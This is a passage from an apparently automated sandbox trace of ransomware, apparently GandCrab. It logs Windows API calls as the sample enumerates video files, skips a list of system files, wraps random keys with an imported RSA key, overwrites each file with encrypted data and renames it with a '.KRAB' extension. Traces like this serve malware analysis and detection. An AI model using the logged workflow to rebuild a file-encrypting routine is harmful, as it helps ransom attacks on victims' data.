dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.530] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.531] GetLastError () returned 0x0 [0099.531] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.531] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0099.531] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011018) returned 1 [0099.531] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd920) returned 1 [0099.531] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.531] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.532] GetLastError () returned 0x0 [0099.532] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.532] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0099.532] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\x-6wz-ebup1f8rehh z.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.532] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.533] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.533] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x6d43, lpOverlapped=0x0) returned 1 [0099.545] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff92bd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.546] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6d43, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x6d43, lpOverlapped=0x0) returned 1 [0099.546] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0099.546] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.550] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.550] CloseHandle (hObject=0x3a8) returned 1 [0099.550] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.550] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\x-6wz-ebup1f8rehh z.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\x-6Wz-eBuP1F8rehH Z.avi.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\x-6wz-ebup1f8rehh z.avi.krab")) returned 1 [0099.551] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.552] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.552] lstrcmpW (lpString1="zf-4pco0oHyKp_.avi", lpString2=".") returned 1 [0099.552] lstrcmpW (lpString1="zf-4pco0oHyKp_.avi", lpString2="..") returned 1 [0099.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="zf-4pco0oHyKp_.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi" [0099.552] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.552] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi.KRAB") returned 71 [0099.552] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi") returned 66 [0099.552] lstrlenW (lpString=".avi") returned 4 [0099.552] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.553] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".avi ") returned 5 [0099.553] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.553] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi") returned 66 [0099.553] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi") returned 66 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="desktop.ini") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="autorun.inf") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="ntuser.dat") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="iconcache.db") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="bootsect.bak") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="boot.ini") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="ntuser.dat.log") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="thumbs.db") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.553] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.554] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="ntldr") returned 1 [0099.554] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="NTDETECT.COM") returned 1 [0099.554] lstrcmpiW (lpString1="zf-4pco0oHyKp_.avi", lpString2="Bootfont.bin") returned 1 [0099.554] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.554] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0099.554] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.555] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.555] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.555] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0099.555] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.555] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.555] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0099.556] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.557] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.558] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.558] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0099.558] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.558] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.558] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0099.559] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.559] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.559] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.559] GetLastError () returned 0x0 [0099.559] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.559] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.559] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0099.560] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.560] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.560] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.560] GetLastError () returned 0x0 [0099.560] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.560] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.560] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\zf-4pco0ohykp_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.561] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.561] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.561] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x8a3c, lpOverlapped=0x0) returned 1 [0099.574] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff75c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.574] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x8a3c, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x8a3c, lpOverlapped=0x0) returned 1 [0099.575] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0099.575] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.578] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.579] CloseHandle (hObject=0x3a8) returned 1 [0099.579] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.579] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\zf-4pco0ohykp_.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\zf-4pco0oHyKp_.avi.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\zf-4pco0ohykp_.avi.krab")) returned 1 [0099.580] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.580] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0099.580] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0099.580] CloseHandle (hObject=0x434) returned 1 [0099.581] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.581] lstrcmpW (lpString1="Rv_JGkW.flv", lpString2=".") returned 1 [0099.581] lstrcmpW (lpString1="Rv_JGkW.flv", lpString2="..") returned 1 [0099.581] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="Rv_JGkW.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv" [0099.581] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.581] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv.KRAB") returned 45 [0099.581] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv") returned 40 [0099.581] lstrlenW (lpString=".flv") returned 4 [0099.581] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.581] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0099.582] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.582] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv") returned 40 [0099.582] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv") returned 40 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="desktop.ini") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="autorun.inf") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="ntuser.dat") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="iconcache.db") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="bootsect.bak") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="boot.ini") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="ntuser.dat.log") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="thumbs.db") returned -1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="ntldr") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="NTDETECT.COM") returned 1 [0099.582] lstrcmpiW (lpString1="Rv_JGkW.flv", lpString2="Bootfont.bin") returned 1 [0099.582] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.583] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.583] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.584] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.584] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.584] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.584] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.584] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.584] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0099.585] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.585] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.585] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.585] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.585] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0099.585] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.586] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0099.586] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0099.586] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.586] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.587] GetLastError () returned 0x0 [0099.587] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0099.587] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0099.587] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011678) returned 1 [0099.587] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0099.588] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.588] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.588] GetLastError () returned 0x0 [0099.588] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0099.588] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0099.588] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\rv_jgkw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.589] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.589] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.589] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x15154, lpOverlapped=0x0) returned 1 [0099.608] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffeaeac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.608] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15154, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x15154, lpOverlapped=0x0) returned 1 [0099.609] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.609] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.613] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.614] CloseHandle (hObject=0x434) returned 1 [0099.614] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.614] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\rv_jgkw.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Rv_JGkW.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\rv_jgkw.flv.krab")) returned 1 [0099.615] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.615] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.615] lstrcmpW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2=".") returned 1 [0099.615] lstrcmpW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="..") returned 1 [0099.615] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="TEjMJz3BzM9Zxn.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv" [0099.615] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.615] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv.KRAB") returned 52 [0099.616] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv") returned 47 [0099.616] lstrlenW (lpString=".mkv") returned 4 [0099.616] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.616] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0099.616] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.616] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv") returned 47 [0099.616] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv") returned 47 [0099.616] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="desktop.ini") returned 1 [0099.616] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="autorun.inf") returned 1 [0099.616] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="ntuser.dat") returned 1 [0099.616] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="iconcache.db") returned 1 [0099.616] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="bootsect.bak") returned 1 [0099.616] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="boot.ini") returned 1 [0099.616] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="ntuser.dat.log") returned 1 [0099.616] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="thumbs.db") returned -1 [0099.617] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0099.617] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.617] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.617] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="ntldr") returned 1 [0099.617] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="NTDETECT.COM") returned 1 [0099.617] lstrcmpiW (lpString1="TEjMJz3BzM9Zxn.mkv", lpString2="Bootfont.bin") returned 1 [0099.617] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.617] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0099.618] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.618] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.618] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.618] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.618] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0099.618] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 